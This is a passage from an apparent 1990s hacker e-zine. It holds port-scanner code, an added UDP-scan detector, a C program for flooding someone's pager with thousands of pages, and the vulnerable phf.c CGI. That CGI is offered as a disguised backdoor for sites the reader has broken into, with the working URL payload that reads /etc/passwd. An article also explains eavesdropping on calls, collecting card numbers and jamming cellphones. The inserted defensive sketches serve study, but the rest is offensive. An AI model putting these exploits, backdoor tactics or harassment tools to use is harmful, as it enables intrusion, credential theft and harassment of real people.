soft_limit = (ports_busy + 1) / 2;
} else if (replies < 0 && avg_irt) {
soft_limit = 0.5 + 0.5 * (soft_limit + avg_rtt / avg_irt);
replies = soft_limit / 2;
}
}
}

/* drop_port - release port info, update statistics */

drop_port(sp)
struct port_info *sp;
{
ports_busy--;
probes_done++;
ring_detach((RING *) sp);
ring_append(&dead_ports, (RING *) sp);

/*
* Increase the load when a sufficient number of probes succeeded.
* Occasional retransmissons will keep the load unchanged.
*/

if (replies > soft_limit) {
replies = soft_limit / 2;
if (soft_limit < hard_limit)
soft_limit++;
}
}

/* init_port_info - initialize port info pool */

init_port_info()
{
struct port_info *sp;

port_info = (struct port_info *) mymalloc(hard_limit * sizeof(*port_info));
ring_init(&active_ports);
ring_init(&dead_ports);
for (sp = port_info; sp < port_info + hard_limit; sp++)
ring_append(&dead_ports, (RING *) sp);
}

/* find_port_info - lookup port info */

struct port_info *find_port_info(port)
int port;
{
struct port_info *sp;

for (sp = (struct port_info *) ring_succ(&active_ports);
sp != (struct port_info *) & active_ports;
sp = (struct port_info *) ring_succ((RING *) sp))
if (sp->port == port)
return (sp);
return (0);
}
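
Seen from the network's side, the decoding done in receive_icmp() above is
also what a sensor needs in order to notice a UDP scan: every closed port that
gets probed produces an ICMP port-unreachable quoting the probe. The following
is an added example, not part of udp-scan.c or Satan; the function names, the
fixed-size table and the sample packets (192.0.2.x documentation addresses) are
constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICMP_HDR    8   /* type, code, checksum, 4 unused bytes */
#define MAX_PROBERS 16  /* assumption: small fixed table for the demo */
struct prober { uint32_t addr; unsigned distinct; uint8_t seen[65536 / 8]; };
static struct prober table[MAX_PROBERS];
static int n_probers;

/* Validate an IPv4 header at p; return its length in bytes, 0 if bad. */
static size_t ipv4_hdr_len(const uint8_t *p, size_t avail)
{
    size_t ihl = (avail >= 20 && (p[0] >> 4) == 4) ? (size_t)(p[0] & 0x0f) * 4 : 0;
    return (ihl >= 20 && ihl <= avail) ? ihl : 0;
}

/* Decode one raw IPv4 packet. For an ICMP destination-unreachable quoting a
 * UDP datagram, store the quoted source and port and return the ICMP code
 * (3 = port unreachable); -1 for anything else or anything cut short. */
int parse_udp_unreach(const uint8_t *pkt, size_t len, uint32_t *prober, uint16_t *dport)
{
    size_t ihl, inner_ihl, left;
    const uint8_t *icmp, *inner;
    if ((ihl = ipv4_hdr_len(pkt, len)) == 0 || pkt[9] != 1)  /* 1 = ICMP */
        return -1;
    icmp = pkt + ihl;
    if (len - ihl < ICMP_HDR || icmp[0] != 3)   /* 3 = dest unreachable */
        return -1;
    inner = icmp + ICMP_HDR;
    left = len - ihl - ICMP_HDR;
    inner_ihl = ipv4_hdr_len(inner, left);
    if (inner_ihl == 0 || inner[9] != 17 || left - inner_ihl < 8)
        return -1;                              /* 17 = UDP, 8 = UDP header */
    *prober = ((uint32_t)inner[12] << 24) | ((uint32_t)inner[13] << 16) |
              ((uint32_t)inner[14] << 8) | inner[15];
    *dport = (uint16_t)((inner[inner_ihl + 2] << 8) | inner[inner_ihl + 3]);
    return icmp[1];
}

/* Record a closed port probed by addr; return its distinct-port count. */
unsigned note_closed_port(uint32_t addr, uint16_t port)
{
    struct prober *p = table;
    while (p < table + n_probers && p->addr != addr)
        p++;
    if (p == table + n_probers) {               /* first sighting */
        if (n_probers == MAX_PROBERS)
            return 0;                           /* table full: untracked */
        p->addr = addr;                         /* slot is still all zero */
        n_probers++;
    }
    if (!(p->seen[port >> 3] & (1u << (port & 7)))) {
        p->seen[port >> 3] |= (uint8_t)(1u << (port & 7));
        p->distinct++;
    }
    return p->distinct;
}

/* Constructed sample: the 56-byte reply sent when dport has no listener. */
size_t build_sample(uint8_t *buf, uint32_t prober, uint16_t dport)
{
    uint8_t *inner = buf + 20 + ICMP_HDR;
    memset(buf, 0, 56);
    buf[0] = 0x45;  buf[9] = 1;                 /* outer IPv4, proto ICMP */
    buf[20] = 3;    buf[21] = 3;                /* unreachable, code 3 = port */
    inner[0] = 0x45;  inner[9] = 17;            /* quoted IPv4, proto UDP */
    inner[12] = (uint8_t)(prober >> 24);  inner[13] = (uint8_t)(prober >> 16);
    inner[14] = (uint8_t)(prober >> 8);   inner[15] = (uint8_t)prober;
    inner[22] = (uint8_t)(dport >> 8);    inner[23] = (uint8_t)dport;
    return 56;                                  /* 20 + 8 + 20 + 8 */
}

/* Replay constructed replies for ports 1..30 and a repeat of port 7, then a
 * truncated and a bad-IHL packet; returns 30, or 0 if junk was accepted. */
unsigned demo(void)
{
    uint8_t buf[64];
    uint32_t who;
    uint16_t dport;
    unsigned count = 0;
    size_t n = 0;
    int i;
    for (i = 1; i <= 31; i++) {
        n = build_sample(buf, 0xC0000205u, (uint16_t)(i == 31 ? 7 : i));
        if (parse_udp_unreach(buf, n, &who, &dport) == 3)
            count = note_closed_port(who, dport);
    }
    if (parse_udp_unreach(buf, n - 1, &who, &dport) != -1)  /* cut short */
        return 0;
    buf[28] = 0x4f;                             /* quoted IHL claims 60 bytes */
    return parse_udp_unreach(buf, n, &who, &dport) != -1 ? 0 : count;
}

int main(void)
{
    return printf("distinct closed UDP ports probed by 192.0.2.5: %u\n", demo()) < 0;
}
```

A sensor would alert once the count returned for one source crosses a
threshold chosen for the network being watched.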


_____________________________________________________________
[ French Pager Annoying] by memor


A little C++ (Borland 3.1) program for pager annoying.

1--- Why that program?

You call French TATOO pagers via an automatic number reserved for each pager.
In France, they mostly begin with 0806xxxx (for calling them from a foreign
country like the USA, it is (+33) 806xxxx).

Well, that program uses the modem to page someone you want to call you back:
it dials his pager and sends the message (a number he will have to call back).
The program makes your modem page him one time or many times; by many times
I mean you can fill his pager memory with 50-60k of pages.


*** BY THE WAY ***


The dialing process for a french pager "TATOO" Motorola&France Telecom is

1/ Dial Tatoo Pager
2/ Dial Numeric Message
3/ Dial #
4/ Hang Up

That's why the algorithm of my program is:


begin:
|
| ****************************
| *Define variables nbr,a,...*
| ****************************
|
| ***************************
| *Configure (9600bauds,8n1)* (8n1 = 8 bits per byte.. No parity and 1 Stop Bit)
| ***************************
|
| ********************************
| *Ask Time Number of Paging->nbr*
| ********************************
|
| **************************
| *His Pager Number->Number*
| **************************
|
|
| **************************
| *Message to send->Message*
| **************************
|
| *******************
| *Send ATZ + Return*
| *******************
|
| **************
| *Wait 0.5 Sec*
| **************
|
| ********************
| *0 to nbr.. do that*
| ********************
| |
| | ***********
| | *Send ATDT*
| | ***********
| |
| | *************
| | *Send Number*
| | *************
| |
| | ***********
| | *Send ,,,,*
| | ***********
| |
| | **************
| | *Send Message*
| | **************
| |
| | *************
| | *Send Return*
| | *************
| |
| | **********
| | *Send +++*
| | **********
| |
| | *************
| | *Wait 1.5sec*
| | *************
| |
| | ********************
| | *Send ATH0 + Return*
| | ********************
|
| *************
| *Continue It*
| *************
|
end:

******************

To drive the serial device I used INT86 (in dos.h) here. I could have used
outportb, but I felt like using int86 (the slower thing); maybe next time I'll
do it with outportb.

In that program I used these modem commands, but first:

*REMEMBER...*

AT commands carry the prefix "AT" and are issued to the modem from command
mode (command mode is set automatically when the computer is turned on).

*************

ATZ : the reset. This AT command resets all the modem values to their
default settings. It responds OK; you mostly have to wait 1/2 sec before
sending other commands.

ATD : dial. This AT command instructs the modem to go off-hook and dial the
number that follows it. The command can be followed by a dial modifier:

P: pulse dial (pulse rotary dialing), not needed here AT ALL
T: touch tone dial; I'll use THAT one.

So ATDT is touch tone dialing.

A "," in an ATDT string waits for a 2-second delay.

ATDT 11,,2 will dial 11, wait 4 seconds (2*2s) and dial 2, all of it in
touch tone.

+++ : sets the modem to command mode; it's an escape sequence. It needs at
least a one-second pause before issuing other commands.

ATH0 : switches the hook control and instructs the modem to drop the line,
i.e. hang up.


2--- Some Programming..


/*Including libraries*/

#include <dos.h> /*For using INT86*/
#include <string.h> /*Gets and Strlen are here*/
#include <stdio.h> /*Printf..Scanf...*/
#include <conio.h> /*For Lame Presentation*/
#include <stdlib.h> /*For Fun maybe*/

/*Define modem reseting,dialing,hangup,pause*/

char atz[10]="ATZ\n"; /*Reset*/
char atdt[10]="ATDT"; /*Dial Mode Touch Tone Dial*/
char pose[10]=",,,,"; /*2sec Pause * 4*/
char ppp[10]="+++\n"; /*Escape to Command Mode*/
char ath[10]="ATH0\n"; /*Hey Modem!,Drop the line please*/

/*define sub-fonctions modem configuring and Char sending*/

void configure(); /*Define Default Modem Configuring*/
void send(char x); /*Define Send the Char X!*/

/*main routine*/

void main()
{
int a,nbr=0; /*Define number of paging*/
char number[128]; /*Define pager number as char*/
char message[128]; /*Define Message to send as Char*/
clrscr(); /*Lame presentation*/
configure(); /*Call modem configuring*/
printf("Modem configured\n 9600 8n1"); /*Lame Presentation*/
printf("How many time do u want to page him?"); /*Same*/
scanf("%d",&nbr); /*Asking number of paging*/
fflush(stdin); /*For killing some bug with gets*/
printf("What is his pager number?"); /*Lame Presentation*/
gets(number); /*Catching pager number*/
printf("What message u want to send him (finish by a # on french Tatoos pager)"); /*Lame Presentation*/
gets(message); /*Catching Message to page*/
printf("Reseting modem\n"); /*Lame Presentation*/
for(a=0;a<strlen(atz);a++) /*Reseting modem*/
send(atz[a]); /*Call Send Char*/
delay(500); /*Wait time the modem reply 'OK' */
for(int i=0;i<nbr;i++) /*Number of time it will page*/
{
printf("Paging him %d / %d \n",i+1,nbr); /*Lame Presentation*/
for(a=0;a<strlen(atdt);a++) /*ATDT in progress*/
send(atdt[a]); /*Call Send Char*/
for(a=0;a<strlen(number);a++) /*Pager Numer in progress*/
send(number[a]); /*Call Send Char*/
for(a=0;a<strlen(pose);a++) /*Pause in Progress*/
send(pose[a]); /*Call Send Char*/
for(a=0;a<strlen(message);a++) /*Sending Message in Progress*/
send(message[a]); /*Call Send Char*/
send(13); /*Send Return*/
for(a=0;a<strlen(ppp);a++) /*Escape Sequence to Command Mode in Progress*/
send(ppp[a]); /*Call Send Char*/
delay(1500); /*Wait 1.5 sec before sending ByeBye Command*/
for(a=0;a<strlen(ath);a++) /*Hanging Up Command in Progress*/
send(ath[a]); /*Call Send Char*/
delay(500); /*Wait 0.5sec before other paging*/
} /*Go Back to the For*/


printf("Paging finished\n"); /*Lame Presentation*/
}


void configure() /*Configuring modem*/
{
union REGS regs; /*Preparing INT86*/
regs.h.ah=0; /*For Configuring Option*/
regs.x.dx=1; /*1 here cause its needed*/
regs.h.al=0xe3; /*0xE3 for 8n1 9600bauds*/
int86(0x14,&regs,&regs); /*0x14 for serial using of INT86*/
}

void send(char x) /*Sending a char X*/
{
union REGS regs; /*Preparing INT86*/
regs.h.ah=1; /*For Sending Option*/
do /*Preparing a Do-while*/
{
regs.x.dx=1; /*1 here cause its needed*/
regs.h.al=x; /*Send X please..*/
int86(0x14,&regs,&regs); /*0x14 for serial using of INT86*/

}while(regs.h.ah!=0); /*While sending not succeeded, continue trying*/
}


3--- Next time.

Next time, I can do.. either that same program but with outportb (faster),
or that program under some Windows interface.. or a totally different
program, a wardialler.. or a PBX scanner.. Decide for me dudes.

_____________________________________________________________
[ The good old phf.c ]

Ok, you're saying, 'what, not this old lame trick'. But hey, shut up and
read this for a minute. What I'm giving you here is, well ok, public domain,
but have any of you even bothered to go to the NCSA and get a copy? Probably
not. This hole is now well known, but hey, set this program up in the cgi-bin
of the site you have broken into. Compile and instant back door to the
passwords. Am I right, or am I right? Anyway, I was going thru this code the
other day, and then poof, memor was telling me, his standard procedure now is
to load this up after renaming it memor, so snooping sysadmins don't notice
it, which is a good idea, but I'd call it either 'logger' or 'scan' or
some other 'official' sounding httpd cgi so they don't mess with it. Anyway, go
have fun with this you little delinquents. Oh, by the way, if you've been
messing with some Netscape server ( which doesn't come with phf ) install it,
and share passwords with your friends, trade, collect, share, etc. ( hmmm, I
guess that passwd files are as collectable as baseball cards )

Ok, if you've forgotten how this thing works, type in the following:

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

[ phf.c ]
#include <stdio.h>
#include <stdlib.h>
#include <string.h> /* strcpy, strcat, strcmp, strlen */

#define LF 10
#define HTML_BREAK printf("<P>%c", LF);
typedef struct {
char name[128];
char val[128];
} entry;

typedef struct {
char qfield[256];
int qlen;
char qname[256];
} fields;

void getword(char *word, char *line, char stop);
char x2c(char *what);
void unescape_url(char *url);
void plustospace(char *str);
void send_fd(FILE *f, FILE *fd);
void send_doc(int which);

static fields idxfields[] = { {"Qalias", 32, "Alias"},
{"Qname", 256, "Name" },
{"Qemail", 128, "E-mail Address"},
{"Qnickname", 120, "Nickname"},
{"Qoffice_phone", 60, "Office Phone Number"},
{"Qcallsign", 16, "HAM Callsign"},
{"Qproxy", 64, "Proxy"},
{"Qhigh_school", 30, "High School"},
{"Qslip", 256, "SLIP Address"},
{NULL, 0, NULL}
};

static fields othersearchfields[] = { {"Qcurriculum", 64, "Curriculum"},
{"Qphone", 64, "Phone Number" },
{"Qaddress", 128, "Address"},
{"Qoffice_address", 128, "Office Address"},
{"Qhome_address", 128, "Home Address"},
{"Qpermanent_address", 128, "Permanent Address"},
{"Qpermanent_phone", 60, "Permanent Phone"},
{"Qdepartment", 64, "Department"},
{"Qtitle", 64, "Title"},
{"Qproject", 256, "Project"},
{"Qother", 256, "Other"},
{"Qbirthday", 24, "Birthday"},
{"Qcolleges", 120, "Colleges Attended"},
{"Qleft_uiuc", 24, "Date/Month Person left UIUC"},
{NULL, 0, NULL},
};

void send_doc(int which) {
int x;

printf("<TITLE>Form for CSO PH query</TITLE>%c", LF);
printf("<H1>Form for CSO PH query</H1>%c", LF);
printf("This form will send a PH query to the specified ph server.%c", LF);
HTML_BREAK
printf("<HR>%c", LF);

printf("<FORM ACTION=\"http://%s:%s%s\">%c", getenv("SERVER_NAME"),
getenv("SERVER_PORT"), getenv("SCRIPT_NAME"), LF);

printf("PH Server:<INPUT TYPE=\"text\" NAME=\"Jserver\" VALUE=\"ns.uiuc.edu\" MAXLENGTH=\"256\">%c", LF);
HTML_BREAK

printf("<H3>At least one of these fields must be specified:</H3><UL>%c",LF);
for(x=0; idxfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"text\" NAME=\"%s\" MAXLENGTH=\"%d\">%s%c"
,idxfields[x].qfield, idxfields[x].qlen, idxfields[x].qname,LF);

printf("</UL>%c", LF);

if (!(which&0x10)) {
printf("<A HREF=\"%s?Jform=%d\"><H3>Show additional fields to narrow query</H3></A>%c", getenv("SCRIPT_NAME"), (which | 0x10), LF);
}
else {
printf("<H3>Additional fields to narrow query:</H3><UL>%c",LF);

for(x=0; othersearchfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"text\" NAME=\"%s\" MAXLENGTH=\"%d\">%s%c"
,othersearchfields[x].qfield, othersearchfields[x].qlen,
othersearchfields[x].qname,LF);

printf("</UL>%c", LF);

printf("<A HREF=\"%s?Jform=%d\">Show fewer query fields</A>%c", getenv("SCRIPT_NAME"), (which & 0x01), LF);
}

HTML_BREAK

if (!(which & 0x01)) {
printf("<A HREF=\"%s?Jform=%d\"><H3>Return more than default fields</H3></A>%c", getenv("SCRIPT_NAME"), (which | 0x01), LF);
}
else {
printf("<H3>Fields to return:</H3><UL>%c", LF);

for(x=0; idxfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"checkbox\" NAME=\"return\" VALUE=\"%s\">%s%c", &(idxfields[x].qfield[1]), idxfields[x].qname, LF);

for(x=0; othersearchfields[x].qlen != 0; x++)
printf("<LI><INPUT TYPE=\"checkbox\" NAME=\"return\" VALUE=\"%s\">%s%c", &(othersearchfields[x].qfield[1]), othersearchfields[x].qname, LF);

printf("</UL>%c", LF);

printf("<A HREF=\"%s?Jform=%d\">Return default fields</A>%c", getenv("SCRIPT_NAME"), (which & 0x10), LF);
}

HTML_BREAK
printf("<INPUT TYPE=\"submit\">%c", LF);
printf("</FORM>%c", LF);

printf("<HR>%c<ADDRESS>", LF);
printf("Questions, comments to: <a href=\"http://www.ncsa.uiuc.edu/SDG/People/jbrowne/jbrowne.html\">Jim Browne</a>%c", LF);
printf("</ADDRESS>%c", LF);

}

main(int argc, char *argv[]) {
entry entries[64];
register int x,m=0;
char *cl;
char returnstr[1024], typestr[4098], commandstr[8192], serverstr[256];
int atleastonereturn = 0, atleastonequery = 0, which = 0;
FILE *phfp;

printf("Content-type: text/html%c%c",LF,LF);

strcpy(returnstr, "return ");
strcpy(typestr, " ");

cl = getenv("QUERY_STRING");

if((!cl) || (!cl[0])) {
send_doc(0);
exit(1);
}

for(x=0;cl[0] != '\0';x++) {
m=x;
getword(entries[x].val,cl,'&');
plustospace(entries[x].val);
unescape_url(entries[x].val);
getword(entries[x].name,entries[x].val,'=');
}

for(x=0; x <= m; x++) {
/* printf("%s = %s %c", entries[x].name, entries[x].val, LF); */

if (!strcmp(entries[x].name, "return")) {
strcat(returnstr, entries[x].val);
strcat(returnstr, " ");
atleastonereturn = 1;
}
else if ((entries[x].name[0] == 'Q') && strlen(entries[x].val)) {
strcat(typestr, &(entries[x].name[1]));
strcat(typestr, "=");
strcat(typestr, entries[x].val);
strcat(typestr, " ");
atleastonequery = 1;
}
else if (!strcmp(entries[x].name, "Jserver"))
strcpy(serverstr, entries[x].val);
else if (!strcmp(entries[x].name, "Jform"))
if (sscanf(entries[x].val, "%d", &which)) {
send_doc(which);
exit(1);
}
else exit(1);
}

printf("<H1>Query Results</H1>%c", LF);
HTML_BREAK

if (!atleastonequery) printf("<B>You did not enter a query!</B>%c",LF);
else {
strcpy(commandstr, "/usr/local/bin/ph -m ");
if (strlen(serverstr)) {
strcat(commandstr, " -s ");
/* RM 2/22/94 oops */
escape_shell_cmd(serverstr);
strcat(commandstr, serverstr);
strcat(commandstr, " ");
}
escape_shell_cmd(typestr);
strcat(commandstr, typestr);
if (atleastonereturn) {
escape_shell_cmd(returnstr);
strcat(commandstr, returnstr);
}

printf("%s%c", commandstr, LF);
printf("<PRE>%c", LF);

phfp = popen(commandstr,"r");
send_fd(phfp, stdout);

printf("</PRE>%c", LF);
}
}
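
Added example, not part of the original article or of NCSA's code: the URL quoted above works because the CGI decodes %0a to a newline before the value reaches popen(), and /bin/sh treats an unescaped newline as a command separator. The sketch contrasts blacklist escaping that omits newline with an allowlist check; META_NO_NL and every function name here are assumptions made for illustration, since escape_shell_cmd() itself is not shown on this page.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed blacklist for illustration: shell metacharacters, newline absent. */
static const char META_NO_NL[] = "&;`'\"|*?~<>^()[]{}$\\";

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode '+' and %XX as a CGI does before using a query value.
 * Returns 0 on success, -1 on malformed escape, encoded NUL or overflow. */
int url_decode(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    if (outsz == 0) return -1;
    while (*in) {
        int c = (unsigned char)*in++;
        if (c == '+') {
            c = ' ';
        } else if (c == '%') {
            int hi = hexval((unsigned char)in[0]);
            int lo = hi < 0 ? -1 : hexval((unsigned char)in[1]);
            if (lo < 0) return -1;          /* not two hex digits */
            c = hi * 16 + lo;
            if (c == 0) return -1;          /* %00 would truncate the string */
            in += 2;
        }
        if (o + 1 >= outsz) return -1;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 0;
}

/* Blacklist escaping: put a backslash before every byte found in meta.
 * Returns 0 on success, -1 if out is too small. */
int blacklist_escape(const char *in, char *out, size_t outsz, const char *meta)
{
    size_t o = 0;
    if (outsz == 0) return -1;
    for (; *in; in++) {
        if (strchr(meta, *in)) {
            if (o + 1 >= outsz) return -1;
            out[o++] = '\\';
        }
        if (o + 1 >= outsz) return -1;
        out[o++] = *in;
    }
    out[o] = '\0';
    return 0;
}

/* Count the command lines /bin/sh would see: one, plus one per newline
 * not preceded by a backslash (simplified model that ignores quoting). */
int shell_lines(const char *cmd)
{
    int lines = 1;
    size_t i;
    for (i = 0; cmd[i]; i++)
        if (cmd[i] == '\n' && (i == 0 || cmd[i - 1] != '\\'))
            lines++;
    return lines;
}

/* Allowlist check: accept only the bytes a directory lookup value needs. */
int value_is_safe(const char *v)
{
    if (*v == '\0') return 0;
    for (; *v; v++) {
        unsigned char c = (unsigned char)*v;
        if (!isalnum(c) && !strchr(" @._-", c)) return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed input: the query value from the URL quoted in the article. */
    const char *raw = "x%0a/bin/cat%20/etc/passwd";
    char val[128], esc[256], cmd[512];

    if (url_decode(raw, val, sizeof val) != 0) return 1;
    if (blacklist_escape(val, esc, sizeof esc, META_NO_NL) != 0) return 1;
    snprintf(cmd, sizeof cmd, "/usr/local/bin/ph -m alias=%s", esc);
    printf("blacklist without newline: %d shell line(s)\n", shell_lines(cmd));
    printf("allowlist accepts value:   %d\n", value_is_safe(val));
    return 0;
}
```

Rejecting the value outright, or running ph without a shell, is more robust than growing the blacklist one character at a time.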

_____________________________________________________________

---------------------------------------
--=[The history of digital technology]=--
Written by REality
REF. Evolution to Digital (elseberry@usa.net)
---------------------------------------

In the early 1960's the Bell Systems began to introduce and use a new
digital technology in its network. This was necessary because the older
carrier systems were rapidly becoming obsolete, and the demand for newer
and higher speed communications facilities was building both internally and
among the end user communities.

As this digital technology was being introduced, it was being deployed in
the public telephone network as a means of increasing the traffic capacity,
within the Bell system only, on the existing wire pair cable facilities as
interoffice trunks. The older systems which included the N-Carrier system
used a two or four wire connection through an analog multiplexing device to
deliver 12 or 24 analog channels depending on the version of N-Carrier used.
This was still an inefficient use of the line capacity, and the analog
service was both noisy and required expensive line treatment equipment.
Thus, Bell introduced its newer technology.

The analog systems were therefore coming to the end of their usable life.
The telephone companies had to find a way of improving the utilization of
the cable plant on an interoffice basis because they had traditionally
under-utilized the pairs of wires and the continued installation of
inefficient systems was expensive and bulky. The average length of these
wires between their offices was approximately 6.5 miles. As calling
requirements continued to grow the telephone companies needed to increase
the traffic handling on these interoffice routes. Yet, they were in a
quandary. First, they didn't want to continue running on major sized cables
between offices, there simply wasn't enough space. Second, costs were
escalating based on the reinforcement to their outside plant.

What did Bell Systems decide to do about this huge problem that they faced?
Keep reading The HAVOC Technical Journal to find out. This story will be
continued in the next edition of The HAVOC Technical Journal.
_____________________________________________________________

-------------------------
--=[Scanning for losers]=--
Written by shamr0ck
-------------------------

Today I'm going to tell you stuff about scanners and fun things you can do
with them. I have found many different active frequencies but the ones that
are the most entertaining are from cellphones (806-956MHz) and cordless
phones (43-50MHz/902-928MHz). I've got a pro-62 scanner and it doesn't have
the cellular frequencies on it because it's illegal to sell scanners that
pick up cellphones in the United States, but not in Canada, if you catch my
drift. I am hoping to modify it some day, but anyway it does pick up cordless
phones, and I've happened upon many different conversations with it. Like
just today I heard some middle aged black guy having phone sex with a fat
chick with a southern accent. Being the loser I am, I listened in for a while
since I wasn't paying for it, and made sure to follow the warning message at
the start of the call and kept both hands on the scanner at all times. I
wasn't abusing myself or anything, I swear. Because of this wonderful
scanner I've picked up calling card and credit card numbers, but God knows I
wasn't planning to use them, because I like paying for stuff. Yeah, that's
it. One of the perks of being close to your unsuspecting scanner victim is
that you can disconnect their cellphone call. First off get your fat ass off
your computer, and run over to radio shack. Acquire a scanner by any means
necessary, but don't be a dumbass and pay more than $200 for it, if you pay
for it at all. You could borrow one or something. Now you're all set. If
you're listening to someone's cellphone call and you're within about 30 feet
of the caller you can hang up their call. If you're asking yourself "How the
fuck can I do that?", shut up and I'll tell you. Find their input frequency..
search 824-850 or whatever. Add 45MHz to see if you hear them on the output
along with the phone line audio. Then if you add 10.7 to that frequency
(if you have a radio shack scanner) and punch it in it will generate a low
power carrier on their phone. Because the phone thinks it lost the cell
frequency it will hang up in about 3 seconds. I didn't come up with this I
got it off a web page but who cares it's still funny as hell. Another thing
to get if you want to know more about scanners is this book called Police
Call. Rip it off at your local radio shack. If you want to know more just
e-mail me at speidel@lightspeed.net or come see me on undernet #phreak. If
I'm not there, goto #flood and bug those shitheads.
_____________________________________________________________

----------------------------------
--=[REality's Digital Dictionary]=--
Written by REality
REF. Racal-DataCOM (elseberry@usa.net)
----------------------------------

(ABAM)
A designation for 22 gauge, 110 ohm, plastic insulated, twisted pair Western
Electric cable normally used in central offices.

(A&B Leads)
This shit refers to the additional leads used typically with a channel bank
two wire E&M interface to certain types of 'ereet' PBXs (also used to return
talk battery to the PBX itself).

(A&B Signaling)
Procedure used in T1 transmission facilities in which one bit, robbed from
each of the 24 subchannels in every sixth frame, is used for carrying dial
and control information. A type of T1 inband signaling, similar to ICMP for
you warez kiddiez.

(Access Unit)
Sometimes this shit is abbreviated as (AU). It is a device that provides ISDN
access to a packet switched service or network. In other words, a k-rad iNET
connection.

(Acoustic Coupler)
WooHoo! This is a device that allows a telephone handset to be used for
access to the switched telephone network for data transmission (generally
limited to low-speed 1200 bps).

(ACU)(Automatic Calling Unit)
A machine that dials a call automatically when under another computer's
control.

(A/D)
This is one of the easiest terms to remember dwds. All it means is "Analog to
Digital conversion."


(ADM3)
A Bellcore designation for the DS-3 device that has familiar functionality to
a T1 mux. In other words, a piece of shit..

(AIS)
In T1, an all ones condition used to alert a receiver that its incoming
signal or frame has been lost. The loss of signal or frame is detected at the
receiving end, and the failed signal is replaced by an all ones condition which
the receiver interprets as an AIS! The normal response to this AIS is for the
receiving end to generate a Yellow Alarm signal as part of its transmission
towards the faulty end. This is sometimes called a Blue signal, and I have no
idea why.

(Algorithm)
A defined set of operational steps to be taken to effect a desired
calculation. An example of its use is the Data Encryption Standard (DES)
algorithm of the National Bureau of Standards which is used in the encryption
of transmitted data to protect its security.

(AM)(Amplitude Modulation)
A transmission technique where the amplitude of the carrier signal is varied
by the value of the signal to be transmitted.

(Ameritech)
One of the seven Regional Bell Holding Companies, resulting from divestiture,
covering the midwestern U.S., based in Chicago, and comprised of Illinois
Bell, Indiana Bell, Michigan Bell, Ohio Bell, and Wisconsin Tel.

(Analog)
In data communications, the description of the continuous wave or signal for
which conventional telephone lines are designed. For transmission on these
lines, the digital or pulse output of a computer or terminal must be
converted to an analog signal.

(ANI)(Automatic Number Identification)
Ability of the network to notify the called party of the calling party's
number and/or directory listing.

(ATM)(Asynchronous Transfer Mode)
A high-speed, connection oriented cell relay transmission scheme that
provides bandwidth to channels as needed. ATM used a 53-octet cell, where the
first five octets convey header information and the remaining 48 octets are
payload.

(Backbone Network)
A transmission facility or arrangement of such facilities designed to
interconnect lower speed distribution channels or clusters of dispersed users
or devices.

(Bandwidth)
A range of frequencies between two defined limits expressed in cycles per
second or Hertz. Also, the information carrying capacity of a circuit.

(Baud)
A unit of signalling speed equivalent to the number of discrete conditions or
signal elements per second. Multiple bits may be used to characterize
individual parameters within one baud (i.e., 9600 bits per second as a rate of
2400 baud = 4 bits per each baud).

(Bellcore)(Bell Communications Research)
The organization established at AT&T divestiture, representing and funded by
the BOCs and RBOCs, for the purpose of establishing eleet telephone network
standards and interfaces.

(Bit Stuffing)
A process in bit-oriented protocols where a zero is inserted into a string of
ones by the sender to prevent the receiver from interpreting valid user data
as control characters.

Check out THTJ11 for the second installment of REality's Digital Dictionary
_____________________________________________________________

-------------------------------
--=[K-Kool hackers chat here!]=--
Discovered by KungFuFox
-------------------------------

While I was busy trashing on the internet, I came across a superhacker
forum that I think all of you should check out, because it's so elite. Well,
at least read the posts, it's funny as hell. Topics include:

"Can't hackers do something good"
"DO any of you really know what hacking is???"
"HACKING KICKS"
"Hack Chat for hackers only!"
"Real Hacker Conversations. Do not come in unless you are a real hacker."
"my moms a hacker"

Personally, I don't know of any hacker moms, and I was certainly interested
in finding out what REAL HACKERS talk about, so I gave it a look. Here's a
few clips that I found to be rather entertaining, from the "HACKING KICKS"
topic.

-
by scott@netbridge.net,
Mon Oct 28 03:06:37 1996
Achieving access to unauthorized places is also known as "burglary". If you
were to break into an unauthorized place, such as my house, for example, you
may find yourself bleeding from bullet wounds. Or, if the place you broke in
to was a computer address, you may find yourself suffering from some other
ailment-imprisonment. All real hackers would tell you, prison life sucks!
This is where all real hackers end up. All others are wannabe's.

by scott@netbridge.net,
Mon Oct 28 03:12:31 1996
PS-If you are not brave enough to leave your name or address, then you must
be a coward.

by Hackers Heaven,
Thu Oct 31 22:10:59 1996
What do you want my address for, do you want to come over and watch me Hack?

by Hackers Heaven,
Thu Oct 31 22:12:30 1996
If I were to break into your house, I would see to it that you were also
bleeding from bullet wounds

by scott@netbridge.net,
Fri Nov 1 05:37:02 1996
I don't like to go to dork's houses, or watch them play with their toys,
pretending to be cool. Come on over-we'll see who's bleeding , and cut down
on 50% of these messages. Thanks for your input. Dork.

by scott@netbridge.net,
Fri Nov 1 05:43:28 1996
PS-If you were a real hacker, you'd have a lot better things to do than leave
messages here. I don't think you're fooling anyone. Give it up, you're not a
real hacker, so quit pretending.
-

Now isn't that just the most elite hacker talk you've ever seen? There's more
where those came from!

http://eagle.online.discovery.com/cgi-bin/forums_view/dir861922735/Technology/Technology%20Central/Hackers/

Discovery probably owns the rights to all that crap once it was posted, but
that doesn't really matter now, does it?

_____________________________________________________________
[news]

--------------
--=[The News]=--
Compiled & edited by KungFuFox
[ More news from antifire and Scud-O ]
--------------

1 : How To Hack Social Security
2 : E-Mail Security Warning
3 : Internet security code said vulnerable to hackers
4 : Hacker Contest Fails to Crack Mac Web Server
5 : Columnist Who Warned of Net's Collapse Pays Up
6 : DNS: The Problematic Phone Book of Cyberspace
7 : Viruses Tripled in Past Year
8 : Trojan Vigilante Targets AOL Cheats
9 : Regional Phone Companies to Offer New Access Technologies for ISPs
10: Hacker Provokes Klan Site Shutdown
11: RedButton Lets Anyone Be Everyone
12: AOL4FREE Culprit Tells His Tale
